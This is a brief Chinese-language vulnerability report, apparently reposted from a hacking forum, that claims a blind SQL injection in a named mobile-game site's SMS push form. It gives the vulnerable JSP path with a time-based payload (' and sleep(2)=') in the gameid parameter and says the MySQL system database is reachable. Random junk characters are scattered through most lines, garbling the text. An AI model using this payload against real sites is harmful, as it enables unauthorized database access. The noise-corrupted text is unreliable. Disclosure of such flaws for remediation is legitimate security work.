简要描述:" z0 y' K/ g* v- A' D! c2 ?2 H
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。+ |) f9 _9 L8 p; ]5 Z+ q7 u
3 |6 r5 f {" O a0 z b' ]; [
详细说明:
6 E. p" O( ]% W( `& Z5 e存在SQL盲注url:
* z- q" @1 [. p' n- P6 e& }5 Nfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=11 r$ O3 Y9 w+ ]5 r! q" k8 v
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png, U' R9 o& f0 k, z
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
: t# S* q& z/ u3 w/ i5 Bhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg: t7 V, \& F* w( G' l2 {: A% G6 ]
+ t$ N9 `9 X4 g+ Q0 S. O" z能看到mysql系统数据库,看来user权限应该很高的。。 |